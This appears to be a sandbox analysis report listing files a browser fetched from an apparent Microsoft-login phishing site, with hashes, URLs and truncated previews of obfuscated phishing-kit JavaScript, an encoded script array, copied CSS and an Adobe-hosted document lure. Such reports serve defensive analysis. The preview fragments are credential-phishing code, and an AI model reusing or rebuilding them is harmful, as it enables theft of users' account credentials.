                                                                                                                                                                                                                                                                                                              SSDEEP:96:hYqN5/alWogo+4dbAJ2KA4GbUKJ2WvOGGd4K5dTsXdOYWXdpsd/mXd3kAZ9BcEQO:6qz/aW8tlW1DcajgwgjA8UojNKqo1X
                                                                                                                                                                                                                                                                                                              MD5:8AF9246F3443004AB4D46F2778660D7E
                                                                                                                                                                                                                                                                                                              SHA1:C713AC40032C00E26C9A0B18E771E636AE6FA07F
                                                                                                                                                                                                                                                                                                              SHA-256:9B9F3BB1C9931FE00EBF0313F5E0762AEE782CEB47D4E3C42A0C23D1B04648F9
                                                                                                                                                                                                                                                                                                              SHA-512:58E97CF99AA7781EEAF9EE7554E8B93E911FC5BACCA0F6289DA0E24DC6DA3FB371408B3E268DB2A498119123AC7C5929D386E9E30FB9C9D075A03E1A0A20D6A8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://yxmaiypmfuyt.holdbitco.ru/cdn-cgi/challenge-platform/h/g/scripts/jsd/c359bc3d/main.js
                                                                                                                                                                                                                                                                                                              Preview:window._cf_chl_opt={cFPWv:'g'};~function(R,g,h,i,n,o){R=b,function(c,e,Q,f,y){for(Q=b,f=c();!![];)try{if(y=parseInt(Q(502))/1*(parseInt(Q(483))/2)+parseInt(Q(465))/3+-parseInt(Q(543))/4*(-parseInt(Q(452))/5)+-parseInt(Q(523))/6+parseInt(Q(515))/7+-parseInt(Q(464))/8*(-parseInt(Q(511))/9)+-parseInt(Q(470))/10,y===e)break;else f.push(f.shift())}catch(z){f.push(f.shift())}}(a,390907),g=this||self,h=g[R(526)],i=function(S,e,f,y){return S=R,e=String[S(520)],f={'h':function(z){return null==z?'':f.g(z,6,function(A,T){return T=b,T(445)[T(455)](A)})},'g':function(z,A,B,U,C,D,E,F,G,H,I,J,K,L,M,N,O,P){if(U=S,z==null)return'';for(D={},E={},F='',G=2,H=3,I=2,J=[],K=0,L=0,M=0;M<z[U(534)];M+=1)if(N=z[U(455)](M),Object[U(485)][U(541)][U(449)](D,N)||(D[N]=H++,E[N]=!0),O=F+N,Object[U(485)][U(541)][U(449)](D,O))F=O;else{if(Object[U(485)][U(541)][U(449)](E,F)){if(256>F[U(469)](0)){for(C=0;C<I;K<<=1,L==A-1?(L=0,J[U(510)](B(K)),K=0):L++,C++);for(P=F[U(469)](0),C=0;8>C;K=1.18&P|K<<1,A-1==L?(L=0,J[U(510)](B(K)
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):27866
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.343116580952641
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:b3r5bDXQlTxQQIkqZ/Ya39g4ZBBXa/8iW72sJbW32F5I2FMB2hPSL:b75bDXX39HxQGJOtlVL
                                                                                                                                                                                                                                                                                                              MD5:085AA3E73D5AA9B1C50DBE389AEA6523
                                                                                                                                                                                                                                                                                                              SHA1:F6196E274795D555C9F642D51C3B3C9282C25790
                                                                                                                                                                                                                                                                                                              SHA-256:122066A536DA17A03501BC94CFA126E89F3E85E8EA253B2324C66903A12BC812
                                                                                                                                                                                                                                                                                                              SHA-512:A9918C83610B580AD2CB9FD290C80F684C830CD3D811B81E0318BDE73B0E3CACF44846F707784064300EFEE70D4350042BDF613C4909A01E241F16ECD1AEB5FE
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://yxmaiypmfuyt.holdbitco.ru/myscr229838.js
                                                                                                                                                                                                                                                                                                              Preview:var erp = new Array;.erp[0] = 1008813135;.erp[1] = 1129601360;.erp[2] = 1159751796;.erp[3] = 1835810317;.erp[4] = 171731060;.erp[5] = 1835802732;.erp[6] = 1634625341;.erp[7] = 577072674;.erp[8] = 1041041980;.erp[9] = 1751474532;.erp[10] = 1041041952;.erp[11] = 538976316;.erp[12] = 1935897193;.erp[13] = 1886658675;.erp[14] = 1919106338;.erp[15] = 1752462448;.erp[16] = 1933193007;.erp[17] = 1668244581;.erp[18] = 778727797;.erp[19] = 1702000942;.erp[20] = 1668246831;.erp[21] = 1785820517;.erp[22] = 1920544051;.erp[23] = 775302704;.erp[24] = 778922350;.erp[25] = 778728226;.erp[26] = 1044131699;.erp[27] = 1668442480;.erp[28] = 1950223626;.erp[29] = 538976288;.erp[30] = 1014195058;.erp[31] = 1768977440;.erp[32] = 1936876349;.erp[33] = 577270900;.erp[34] = 1886599727;.erp[35] = 795043937;.erp[36] = 1819043182;.erp[37] = 1734701870;.erp[38] = 1668050805;.erp[39] = 1684434017;.erp[40] = 1919233635;.erp[41] = 1869426548;.erp[42] = 1970433651;.erp[43] = 1953066085;.erp[44] = 796274735;.erp[45] =
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), CFF, length 63400, version 1.0
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):63400
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.995237409481236
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:W7OVSBwCT8123fGaqF4fmR3K0NGXIrl/6ZoQgDm64Tq5eoK:W7z9T81zaqFe+K1XGliWQgbtK
                                                                                                                                                                                                                                                                                                              MD5:9293D6557565246F30DF049719412321
                                                                                                                                                                                                                                                                                                              SHA1:F0B2FF7C144BDA5FB0E2DACFA02D7D7A67C23D29
                                                                                                                                                                                                                                                                                                              SHA-256:A05CC6BE8342836EB500A5F0B95A0D572C494C3B8A01E708D904CAB4005777B5
                                                                                                                                                                                                                                                                                                              SHA-512:6BB8B4DE060187F1D07A38B08C957CDD05A0CCF332CE58E70033E66246D126C7069DE0F201A3AAF6BD3403A3243DF8965F340CC53B80F562B8F0BC1B59AE649A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8dd865b3bbc383831fe2ea177f62257a9191&fvd=n4&v=3
                                                                                                                                                                                                                                                                                                              Preview:wOF2OTTO...............H.........................F....?DYNA.p?GDYN.m...<..Z.`..,.6.$......... [....0....@...YH..a....PUUUUS....m....~.....W.........._..?........?L.v\..ph....H...n.......O....;..?.V..H"..:3`G...m.......bG./>...u8.:....c7.a.:V...65. .$......M..."....AZ.v'.O:...!....x...r..y.\./k.m.n4.T.1.V.....i6P.-..0..`C.c.Z.."b..1e........!.....t...k..."..Y..B@@....cq<..{..wy&...p....`o(X..4...".....a.(`.E.......6.v.1.Kb.).....x...?..u.d..{.(..DA,..kC...K.$.....o.[.Y..o.8T.P.AG|O~Y..L.M.&....r...H.......x..,.t.%....8.J..Q..%..c........$.t..T..T..C....bbR.5..u>.<N.uS.?[.M.t_* g. ...x../Y.l...X.{_R.....o*v.UO=..A..*...}&HSx.6.&Af.B..S..Y..B....*.}..._...H%\L9.m..c..=P...?{I... Z...`..T_K]..7.'.5.. .^g.}'...4...*..S....l5.i....{m.].....y...2km'....eVh.....+.s:...U.1...A9.%Pw.([..J..K.EU..U-..>@..Ww...Q..c,..s.!?.........Fp#y...<.nL...!.)T..K...SN.^./J...!..E...M.P9.q_...*.2w;f.G.Z$M...4,j...d..0S3.#............(,..YR....-.B...|..[o....[oXB...%.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (13626), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):13626
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.24068778169286
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:VJS8baODLnsyoufnuP7k8ZGEWtMaAJyAdX220BQfwxuGKcKpFHU4PxS1eD:TSzODrsyoufnuP7kHE5aAJyAdX2pBQf1
                                                                                                                                                                                                                                                                                                              MD5:701637CF7B3C9588CDF84DBB449BA48E
                                                                                                                                                                                                                                                                                                              SHA1:A3FD0695DB073372CBB52345CB18CD4F8186EDEB
                                                                                                                                                                                                                                                                                                              SHA-256:FE2EA5CD48F2CA8001C5283EE74D2B41305644374B0C1E7B90B9CB6B5BB73A94
                                                                                                                                                                                                                                                                                                              SHA-512:C164A8263F80E6D51FB5FCA897FDD481F13072726DAB7674A8D2291DB6BDD178015C60D1396B505488D610C690FB7D20E3247A14B9A41F93CF1A74B58DF022DD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://yxmaiypmfuyt.holdbitco.ru/web5/assets/js/pages-head-web.min.js?cb=1698251258165
                                                                                                                                                                                                                                                                                                              Preview:function _0x5cd9(){const _0x2cfb51=['/validatecaptcha','link','safari','title','a_text','Can\x27t\x20access\x20your\x20account?','70195kqeNdw','ready','get','chrome','a_id','userAgent','(((.+)+)+)+$','getElementsByTagName','body','icon','textContent','setAttribute','forEach','render','POST','onclick','signup','add','No\x20account?','length','trace','linkoptionclick(this)','1287870eKpXsa','toString','mb-16','552981uhilkc','2JQMime','.bottomsection','5263424HIItlo','d-none','appendChild','cloudflarecaptcha','bind','Sign\x20in\x20to\x20your\x20Microsoft\x20account','18PCHHwC','head','toggle','.sectioncontent','exception','match','401818xJlwHs','link_text','innerHTML','none','prototype','show-from-right\x200.5s','531062tIIGtl','data-id','Error:','innerText','hash','querySelector','__proto__','Create\x20one!','log','start','loading','cantAccessAccount','256AxiNsp','status','section_uname','search','section_tryingtosignin','expired','replace','substring','createElement','text','rel','classLi
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4382
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.2267403856587356
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:Ygaebt3ebdXcvJ5Nj/par/ZnRHYqwHOvCovGcjOP96s6lIs6lY6Z3:paeR3etcB5N8rxnRj7vtvCF6llIllYE
                                                                                                                                                                                                                                                                                                              MD5:803E57D023A146175B25B7DAFC3E5251
                                                                                                                                                                                                                                                                                                              SHA1:6DACACD5BA23286419785943BFCFE534B6A70268
                                                                                                                                                                                                                                                                                                              SHA-256:8ADD200294C4D37DFB515EC7DEFCC71773C2F674416FEA49100CB7E9F4D00303
                                                                                                                                                                                                                                                                                                              SHA-512:9D3A905AC3ACFD0522DC45B687717DA66379DEE4B2956BBBF19A84D66409EB9F880144202D0126D528B0C6EB907E28C333FB8AEB7543B6E3220F3548819C02D9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"fileVersion":"1.0.0","framesData":[{"frameData":[{"bounds":[99,362,637,413],"containerID":"_idContainer001","frameID":253,"oriPageNo":1,"textBoundary":[[["You have receive 2 documents for review\n",[20,30,40,51,56,67,77,86,97,102,109,120,131,141,146,156,166,171,182,186,197,208,219,230,246,256,267,274,283,288,294,304,312,317,324,335,344,349,360,374],1,[30,40,51,56,67,77,86,97,102,109,120,131,141,146,156,166,171,182,186,197,208,219,230,246,256,267,274,283,288,294,304,312,317,324,335,344,349,360,374,379],21]]]},{"bounds":[74,418,613,508],"containerID":"_idContainer002","frameID":285,"oriPageNo":1,"textBoundary":[[["This message was sent to you to protect sensitive information\n",[6,15,25,30,36,40,55,63,69,76,84,92,100,104,116,124,131,135,141,149,159,164,168,174,183,187,195,204,213,218,223,232,236,245,252,261,266,274,282,287,291,298,306,315,322,327,332,337,345,353,357,362,371,377,386,392,407,415,420,425,434,444],1,[15,25,30,36,40,55,63,69,76,84,92,100,104,116,124,131,135,141,149,159,164,
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (64886)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):170801
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.912035636794902
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:E15SEoW4klWxVt5RMB4miQ1ub735RmNGuIyvULSo9R0SVIIE/OvRdVNwQa9WMc8k:E21BTP4tJgIfSa2TSJeXUUFvSMaISR/i
                                                                                                                                                                                                                                                                                                              MD5:99B8D621035A6F6E7279ADCC4BBE80C5
                                                                                                                                                                                                                                                                                                              SHA1:700B28A07DCFACD502006828CAE85F64E3EAD8AF
                                                                                                                                                                                                                                                                                                              SHA-256:D34133BD9ACADA4B902C1BD83646F6A77B999410C82F1AD09536CAAD5F010A38
                                                                                                                                                                                                                                                                                                              SHA-512:35DECE65FEC0DB23456AF9A45FB006EDFCDC154D6348C1A427989B6B0949E66B55AE9ABB5240EDFBDA9D8F917785C09326C52A478B7F2D0E4733362BC3AA154C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://prod.adobeccstatic.com/utilnav/9.1/utilitynav.css
                                                                                                                                                                                                                                                                                                              Preview:/*. * Copyright 2018 Adobe Systems Incorporated. All rights reserved.. * This file is licensed to you under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License. You may obtain a copy. * of the License at http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software distributed under. * the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS. * OF ANY KIND, either express or implied. See the License for the specific language. * governing permissions and limitations under the License.. */...utilnav-container html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}.utilnav-container body{margin:0}.utilnav-container article,.utilnav-container aside,.utilnav-container footer,.utilnav-container header,.utilnav-container nav,.utilnav-container section{display:block}.utilnav-container h1{font-size:2em;margin:.67em 0}.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (32008)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):47680
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.315198888695839
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:P/BcPdPbl1rli9zNfDFNyozxLY+ww7iyNIiDzA41DIpwMIdUOTYRYRdiAR8aa4kH:PJ+DhsM+Aim6YSkVy3asztYFPAT27
                                                                                                                                                                                                                                                                                                              MD5:7E1862F7A390ED9FC02C299216395547
                                                                                                                                                                                                                                                                                                              SHA1:9BE3F87C9849CBDD8DABABCCEBE77FE5C6B30702
                                                                                                                                                                                                                                                                                                              SHA-256:DD2D8D288526B88B0EAE53168E31B4092ACF39ED38D40FFCBC6D0AB2F7A4AA66
                                                                                                                                                                                                                                                                                                              SHA-512:45EBA74A86E4CB778C406A5CC2CA56283D156D06B59CFD9ACA7221A9DC4BD1CFEBB740D6955CA054A88AFFACF4318F709ED39B0CC4A27978FB780E18D34DC0C0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://js-agent.newrelic.com/nr-spa-1215.min.js
                                                                                                                                                                                                                                                                                                              Preview:!function(t,n,e){function r(e,o){if(!n[e]){if(!t[e]){var a="function"==typeof __nr_require&&__nr_require;if(!o&&a)return a(e,!0);if(i)return i(e,!0);throw new Error("Cannot find module '"+e+"'")}var s=n[e]={exports:{}};t[e][0].call(s.exports,function(n){var i=t[e][1][n];return r(i||n)},s,s.exports)}return n[e].exports}for(var i="function"==typeof __nr_require&&__nr_require,o=0;o<e.length;o++)r(e[o]);return r}({1:[function(t,n,e){var r=t(42);n.exports=function(t,n){return"addEventListener"in window?window.addEventListener(t,n,r(!1)):"attachEvent"in window?window.attachEvent("on"+t,n):void 0}},{}],2:[function(t,n,e){function r(t,n,e,r){var i=d(t,n,e);return i.stats=a(r,i.stats),i}function i(t,n,e,r,i){var a=d(t,n,e,i);return a.metrics=o(r,a.metrics),a}function o(t,n){return n||(n={count:0}),n.count+=1,v(t,function(t,e){n[t]=a(e,n[t])}),n}function a(t,n){return null==t?s(n):n?(n.c||(n=f(n.t)),n.c+=1,n.t+=t,n.sos+=t*t,t>n.max&&(n.max=t),t<n.min&&(n.min=t),n):{t:t}}function s(t){return t?t.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):4382
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.2267403856587356
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:Ygaebt3ebdXcvJ5Nj/par/ZnRHYqwHOvCovGcjOP96s6lIs6lY6Z3:paeR3etcB5N8rxnRj7vtvCF6llIllYE
                                                                                                                                                                                                                                                                                                              MD5:803E57D023A146175B25B7DAFC3E5251
                                                                                                                                                                                                                                                                                                              SHA1:6DACACD5BA23286419785943BFCFE534B6A70268
                                                                                                                                                                                                                                                                                                              SHA-256:8ADD200294C4D37DFB515EC7DEFCC71773C2F674416FEA49100CB7E9F4D00303
                                                                                                                                                                                                                                                                                                              SHA-512:9D3A905AC3ACFD0522DC45B687717DA66379DEE4B2956BBBF19A84D66409EB9F880144202D0126D528B0C6EB907E28C333FB8AEB7543B6E3220F3548819C02D9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://indd.adobe.com/view/publication/e174e561-569a-48e3-8548-c6c6e174aa25/1/content.json
                                                                                                                                                                                                                                                                                                              Preview:{"fileVersion":"1.0.0","framesData":[{"frameData":[{"bounds":[99,362,637,413],"containerID":"_idContainer001","frameID":253,"oriPageNo":1,"textBoundary":[[["You have receive 2 documents for review\n",[20,30,40,51,56,67,77,86,97,102,109,120,131,141,146,156,166,171,182,186,197,208,219,230,246,256,267,274,283,288,294,304,312,317,324,335,344,349,360,374],1,[30,40,51,56,67,77,86,97,102,109,120,131,141,146,156,166,171,182,186,197,208,219,230,246,256,267,274,283,288,294,304,312,317,324,335,344,349,360,374,379],21]]]},{"bounds":[74,418,613,508],"containerID":"_idContainer002","frameID":285,"oriPageNo":1,"textBoundary":[[["This message was sent to you to protect sensitive information\n",[6,15,25,30,36,40,55,63,69,76,84,92,100,104,116,124,131,135,141,149,159,164,168,174,183,187,195,204,213,218,223,232,236,245,252,261,266,274,282,287,291,298,306,315,322,327,332,337,345,353,357,362,371,377,386,392,407,415,420,425,434,444],1,[15,25,30,36,40,55,63,69,76,84,92,100,104,116,124,131,135,141,149,159,164,
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1121
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.591161971630827
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:DfC5ghACx2W+22rrnAzsstFC54X89/WL8bUC54XAJ8:u5ghPtKqq5B515m
                                                                                                                                                                                                                                                                                                              MD5:D58BA54365BFF0A586EB90B19C796E7A
                                                                                                                                                                                                                                                                                                              SHA1:2B2AFF4C88FAA6DA7B3AE1F1FDA0DBC220BB6C13
                                                                                                                                                                                                                                                                                                              SHA-256:03F1D88E4E15D59601A036667E1C97159391E558143178A4B45E247A4975497E
                                                                                                                                                                                                                                                                                                              SHA-512:F880822D9ED5E95F987A9A268742A3BBCE812D755CA3456FC4BF50418C784504D966B793BD2B07830A59F949029D68E5C32E9948AECFAF378C78A095D59E8D40
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://yxmaiypmfuyt.holdbitco.ru/web5/assets/pages/1rd551.css?cb=1698251258165
                                                                                                                                                                                                                                                                                                              Preview:body.start {. background-color: #f2f2f2;. background-image: url('https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg');. background-repeat: no-repeat,no-repeat;. background-position: center center,center center;. background-size: cover,cover;. color: #1b1b1b;. }.. .btn {. margin: 0 0 0 auto;. display: block;. background-color: #0067b8;. color: #fff;. border: 2px solid #0067b8;. padding: 5px 30px;. font-size: 15px;. cursor: pointer;. }.. .btn:hover {. background-color: #0067b8;. }.. .firstlogo{. background-image: url("/web5/assets/officelogo.png");. background-size: 100% 100%;. width: 108px;. height: 24px;. background-repeat: no-repeat;. }. .bannerlogo{. height: 24px;. max-height: 36px;. background-image: url("/web5/assets/officelogo.png");. backgr
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):34494
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.028102929129642
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:4KOr5hOo0Qhk2fAewTq/iwa2R7Qz8pz4DopTPGFsbN:qbl626uRg8pvF
                                                                                                                                                                                                                                                                                                              MD5:88415ACDA09A4CBD9D87543C3BA78180
                                                                                                                                                                                                                                                                                                              SHA1:2DEC4705E9AB399EFDC6EEF36E079AA31D1DF8D9
                                                                                                                                                                                                                                                                                                              SHA-256:20CCCC47C1BAC9D2EF36B6A1C58AF58C5C169AD5CA084080F0392B86F949641C
                                                                                                                                                                                                                                                                                                              SHA-512:77D0D7E0C85A1CAD6A22372F2D3904C0842628CE7F1ADAC9A2A0CBF3B566CE8148527B0E7EDE2BB068F5D005917B3F95C2A25D031D0D4D7A6A5A117CEFA83B24
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://yxmaiypmfuyt.holdbitco.ru/web5/assets/cloudfavicon.ico
                                                                                                                                                                                                                                                                                                              Preview:............ .h...V......... ......... .... .....F...00.... ..%......@@.... .(B...D..(....... ..... ............................................................................................................................................................................................................................................................................................h...........................................................Zd... ... ... ... ... ... ... ... ... ...B.......N...@...@...s......6.... ... ...?...[...a...g...l...r...............}...M...............m... ... ... ... ... ... ... ... ...[...j...@...d..................P ... ... ... ... ... ... ... ... ..........X.......................6...Hf... ... ... ... ... ...B...........................................G... ... ... ...5......2...............................................X.......f..................................................................................................................................
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):34494
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.028102929129642
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:4KOr5hOo0Qhk2fAewTq/iwa2R7Qz8pz4DopTPGFsbN:qbl626uRg8pvF
                                                                                                                                                                                                                                                                                                              MD5:88415ACDA09A4CBD9D87543C3BA78180
                                                                                                                                                                                                                                                                                                              SHA1:2DEC4705E9AB399EFDC6EEF36E079AA31D1DF8D9
                                                                                                                                                                                                                                                                                                              SHA-256:20CCCC47C1BAC9D2EF36B6A1C58AF58C5C169AD5CA084080F0392B86F949641C
                                                                                                                                                                                                                                                                                                              SHA-512:77D0D7E0C85A1CAD6A22372F2D3904C0842628CE7F1ADAC9A2A0CBF3B566CE8148527B0E7EDE2BB068F5D005917B3F95C2A25D031D0D4D7A6A5A117CEFA83B24
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:............ .h...V......... ......... .... .....F...00.... ..%......@@.... .(B...D..(....... ..... ............................................................................................................................................................................................................................................................................................h...........................................................Zd... ... ... ... ... ... ... ... ... ...B.......N...@...@...s......6.... ... ...?...[...a...g...l...r...............}...M...............m... ... ... ... ... ... ... ... ...[...j...@...d..................P ... ... ... ... ... ... ... ... ..........X.......................6...Hf... ... ... ... ... ...B...........................................G... ... ... ...5......2...............................................X.......f..................................................................................................................................
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (17002), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):17002
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.084835184976265
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:S3PiHSaXZfdY8xbXUfCkDAm0vHXIYECacgAx8K1MbJeKPMq/vHID/gPnqBvMf22U:mtaVdY8xbXn54YE805k0Sgf6
                                                                                                                                                                                                                                                                                                              MD5:68DD1BCCCDE5656BE56122A5370BBB98
                                                                                                                                                                                                                                                                                                              SHA1:18D1618561916E13668295570A157C32ACD9E1F5
                                                                                                                                                                                                                                                                                                              SHA-256:BD5A242E3CD9E703A92C7D2667E8F78A3BA2C97CBD04237665782034E4760ED3
                                                                                                                                                                                                                                                                                                              SHA-512:CA9F64955F1A61B82ADF8FF76FF481099A4F2E4C6F71480CA97E713A966FD0EDF4CDA9118692C11E9C7D8E03DD2D5267EE4042B69BD5B4EA820B4D9F384F5372
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://yxmaiypmfuyt.holdbitco.ru/web5/assets/css/pages.min.css?cb=1698251258165
                                                                                                                                                                                                                                                                                                              Preview:*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections .opts:hover,.back:hover,.row.tile:not(.no-pick):hover{background-color:rgba(0,0,0,.1)}.radio label,.row.tile:not(.no-pick),a.link{cursor:pointer}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}*,input{margin:0}.p,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy{display:flex;flex-direction:column;height:100vh}body{background-color
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):56
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.245602923729013
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:U3KTDW3MiLLUHcyM:H6NLgHRM
                                                                                                                                                                                                                                                                                                              MD5:2C0A27F2F5831B2C5D395CFB1C8F20FA
                                                                                                                                                                                                                                                                                                              SHA1:F9BFE73D0F1597CC62BF9C793CE2938B7A8D4451
